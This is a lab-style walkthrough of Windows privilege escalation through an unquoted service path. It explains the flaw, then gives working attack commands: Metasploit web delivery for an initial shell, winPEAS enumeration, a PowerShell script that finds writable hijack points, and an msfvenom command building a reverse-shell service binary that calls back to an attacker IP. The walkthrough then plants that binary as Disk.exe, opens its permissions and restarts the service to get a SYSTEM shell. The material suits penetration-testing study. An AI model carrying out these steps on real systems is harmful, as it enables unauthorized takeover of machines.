Unquoted Service Path - Windows Escalation

Background Information:

An unquoted service path occurs when the path to a service's executable contains spaces but is not wrapped in "" (quotation marks). The Service Control Manager (SCM) then cannot tell where the executable name ends and its arguments begin, and it resolves the path in a way an attacker can abuse.

Examples:
Properly quoted executable path: "C:\Program Files\RealVNC\VNC Server\vncserver.exe" -service

Unquoted (vulnerable) executable path: C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe

Why are spaces and quotation marks a big deal?
When a command is executed, spaces separate the program name from its arguments unless they are inside a quoted string.

Here is how the Service Control Manager evaluates an unquoted binary path, using C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe as the example:

  1. First, SCM looks for C:\MyPrograms\Disk.exe with the arguments Sorter and Enterprise\bin\disksrs.exe. If Disk.exe does not exist, it moves to step two.

  2. SCM looks for C:\MyPrograms\Disk Sorter.exe with the argument Enterprise\bin\disksrs.exe. If that does not exist either, it moves to step three.

  3. SCM looks for C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe, the binary the service was actually meant to run. Usually, that is the end of the search.
Notice how many candidates SCM tries before it reaches the real application. An attacker can abuse this by placing a malicious executable named Disk.exe in C:\MyPrograms\: SCM finds it at step one and runs it in place of the legitimate binary, with the privileges of the service account. Two conditions must hold for this to work: the attacker needs write access to one of the directories on the path (here C:\MyPrograms\), and the service must be restarted (by the attacker, or at reboot if it starts automatically). Let's see it in action, shall we?

Demonstration

First, I will use the Windows enumeration script winPEAS, which finds potential privilege escalation paths. Here is the link to the script: https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS.
To deliver the script to the target Windows host, I will use the Web Delivery module in Metasploit.

After running the module, Metasploit prints a one-line command. Paste that command into the Windows command line, and Metasploit establishes a connection back to the attacking machine. Once Metasploit has a command shell session, we can upgrade it to a Meterpreter session with: sessions -u 1

We then interact with session two using: sessions -i 2, and transfer the script to the target machine with: upload binary_path.

My winPEASx64 binary is in /home/kali/Downloads, so the command is: upload /home/kali/Downloads/winPEASx64.exe. Then I will spawn a shell and run the enumeration script to find a service vulnerable to an unquoted service path.

Some notes about winPEAS:
You can get the help page with .\winPEASx64.exe help. It lists the checks you can run individually, so you can restrict the output to the information you are looking for.

Note: if you do not specify a check and simply run the binary, the script runs every check on that list. Since we are working with services, I am interested in servicesinfo. Let's run it with .\winPEASx64.exe servicesinfo and redirect the output to a file so we can review it later by appending: > service_info.txt.

Terminal version (screenshot):

Notepad version (screenshot):

The terminal screenshot above reports Disk Sorter Enterprise - No Quotes and Space Detected. This means the service is a candidate for an unquoted service path attack. To get more detail on the service, we can run: sc qc "Disk Sorter Enterprise"

BINARY_PATH_NAME is the executable the service runs (unquoted here, which confirms the finding), and SERVICE_START_NAME is the account the service runs under. A service running under a privileged account such as LocalSystem is what makes this worth attacking, because our planted executable inherits that account.

The plan is to plant our malicious executable at one of the earlier candidate paths so SCM runs it instead of the real binary.
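The candidate-path evaluation described in the Background section and the servicesinfo check winPEAS runs above can be reproduced in a few lines of PowerShell. The script below is an added example, not code from the original post or from winPEAS: it enumerates every service whose unquoted binary path contains a space, lists the paths SCM will try in order, and checks whether the current user can write to each hijack point's directory, which is the condition that makes a finding exploitable. Service and account names in its output are whatever the host has; "Disk Sorter Enterprise" from the post is just one instance. The writability test works by creating and deleting a probe file, which is reliable but leaves a trace in file-system auditing, and the argument split assumes the binary name ends in .exe.

```powershell
# Added example (not from the original post): find unquoted service paths,
# enumerate the paths SCM tries, and flag the ones whose directory we can write.

function Get-ScmCandidatePaths {
    # Returns the executables SCM will try, shortest first; the last entry is
    # the real binary. Returns nothing if the path is quoted or has no space.
    param([string]$PathName)

    if ([string]::IsNullOrWhiteSpace($PathName)) { return }
    if ($PathName.StartsWith('"')) { return }          # quoted: unambiguous

    # Cut off arguments: keep everything up to and including the first ".exe".
    # Assumption: the service binary has an .exe extension.
    $exeIndex = $PathName.IndexOf('.exe', [StringComparison]::OrdinalIgnoreCase)
    if ($exeIndex -lt 0) { return }
    $binary = $PathName.Substring(0, $exeIndex + 4)
    if (-not $binary.Contains(' ')) { return }         # no space: unambiguous

    # SCM tries each space-delimited prefix with ".exe" appended, in order.
    $parts = $binary.Split(' ')
    $candidates = for ($i = 1; $i -lt $parts.Count; $i++) {
        ($parts[0..($i - 1)] -join ' ') + '.exe'
    }
    return @($candidates) + $binary
}

function Test-DirectoryWritable {
    # True if the current user can create a file in $Path (probe file, removed).
    param([string]$Path)

    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path $Path ([IO.Path]::GetRandomFileName())
    try {
        [IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Find-UnquotedServicePaths {
    # One row per hijack point (every candidate except the real binary).
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc = $_
        $candidates = @(Get-ScmCandidatePaths -PathName $svc.PathName)
        if ($candidates.Count -lt 2) { return }
        foreach ($c in $candidates[0..($candidates.Count - 2)]) {
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                StartMode = $svc.StartMode
                DropHere  = $c
                Exists    = Test-Path -LiteralPath $c          # already taken?
                Writable  = Test-DirectoryWritable -Path (Split-Path -Parent $c)
            }
        }
    }
}

# For the post's path this yields C:\MyPrograms\Disk.exe,
# C:\MyPrograms\Disk Sorter.exe and the real disksrs.exe, in that order:
Get-ScmCandidatePaths -PathName 'C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe'

# Only rows we can actually plant a file at are interesting:
Find-UnquotedServicePaths | Where-Object { $_.Writable -and -not $_.Exists } | Format-Table -AutoSize
```

A row with Writable set to true and RunsAs set to LocalSystem is the same finding winPEAS reports. Before proceeding, also confirm you can restart the service (sc stop/start will fail if the service's security descriptor does not grant you SERVICE_STOP and SERVICE_START); if not, a StartMode of Auto means the planted binary runs at the next reboot instead.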

The next step is to create a listener in Metasploit using the multi/handler module. I am not going to go over those steps here.

Then we create the malicious program that connects back to our listener. For this, I will use msfvenom:
Command: msfvenom -p windows/shell_reverse_tcp LHOST=10.13.29.190 LPORT=6777 -f exe-service -o poison_ivy.exe
The exe-service format matters: SCM expects the binary it launches to behave as a service, and a plain executable that never reports its status gets killed shortly after starting. The service wrapper keeps the process alive long enough for the shell to come back.

Now it is time to transfer poison_ivy.exe to the target machine with: upload /home/kali/Downloads/poison_ivy.exe. Once it is on the machine, we move it into C:\MyPrograms\ and rename it to Disk.exe, the first candidate SCM will look for.

From inside C:\MyPrograms\, run: move C:\Users\thm-unpriv\poison_ivy.exe Disk.exe. Then grant Full Control to Everyone so the service account is guaranteed to be able to execute it, using: icacls C:\MyPrograms\Disk.exe /grant Everyone:F

Now restart the service by stopping and starting it (this requires that our user is allowed to control the service; otherwise wait for a reboot if the service starts automatically):
sc stop "disk sorter enterprise"
sc start "disk sorter enterprise"
SCM resolves the unquoted path, finds C:\MyPrograms\Disk.exe, and runs it under the service account, and our listener receives a shell. Congratulations, we have escalated our privileges.

That’s all. Thanks for reading.